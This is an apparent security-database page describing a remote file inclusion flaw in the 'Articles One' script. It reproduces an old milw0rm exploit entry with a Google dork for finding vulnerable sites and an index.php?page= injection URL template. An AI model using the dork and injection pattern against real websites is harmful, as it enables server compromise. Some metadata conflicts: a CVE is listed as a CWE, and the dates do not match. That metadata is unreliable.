Articles One Remote File Inclusion Vulnerability

vendor:

Articles One

by:

Security-Database.com

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Articles One

Affected Version From: 3.1.1

Affected Version To: 3.1.1

Patch Exists: YES

Related CWE: CVE-2018-7491

CPE: a:articlesone:articles_one:3.1.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2018

Articles One Remote File Inclusion Vulnerability

Articles One is prone to a remote file-inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker can exploit this vulnerability to include arbitrary files from remote Web servers that may contain malicious code and execute it in the context of the Web server process.

Mitigation:

Upgrade to version 3.1.2 or later.

Source

Exploit-DB raw data:

                   X                                                                                   X
                XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX           
                X                                                                                        X
                X                                                                                        X   
		X  MMMMMMMMM M     M MMMMMMMM  MMMMMMMM MMMMMMMM M        MMMMMMMMM MMMMMMMMM MMMMMMMMM  X
                X  M          M   M  M      M  M        M      M M        M       M M       M M       M  X
	        X  M           M M   M      M  M        M      M M        M       M M       M M       M  X
		X  M            M    M      M  M        M      M M        M       M M       M M       M  X
		X  M            M    MMMMMMMM  MMMMMMMM MMMMMMMM M        M       M MMMMMMMMM M       M  X
	 	X  M            M    M      M  M        M      M M        M       M M       M M       M  X
		X  M            M    M      M  M        M      M M        M       M M       M M       M  X
		X  M            M    M      M  M        M      M M        M       M M       M M       M  X
		X  MMMMMMMMM    M    MMMMMMMM  MMMMMMMM M      M MMMMMMMM MMMMMMMMM M       M MMMMMMMMM  X
                X                                                                                        X
                X                                                                                        X
                XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX   
                   x                                                                                   x



#################################################################################
#                                                                               #
# TitLe   : ArticLeS One Remote File Inclusion Vulnerability                    #
#                                                                               #
#################################################################################
#                                                                               #
# Site    : www.articlesone.com                                                 #
#                                                                               #
#################################################################################
#                                                                               #
# Author  : CyberLord                                                           #
#                                                                               #
#################################################################################
#                                                                               #
# DoRk    : Powered by ArticlesOne.com oR Website Powered by ArticlesOne.com    #
#                                                                               #
#################################################################################
#                                                                               #
# ExpLoit : http://[site]/[path]/index.php?page=[attackeR Code]                 #
#                                                                               #
#################################################################################
#                                                                               #
# gReatZ  : Sao  ,  Liz0zim  And ALL Cyber-Soldiers.Org Users              	#
#                                                                               #
#################################################################################
#                  								#
# contact : support@cyber-soldiers.org, WwW.Cyber-Soldiers.org                  #
#										#
#################################################################################

# milw0rm.com [2006-07-23]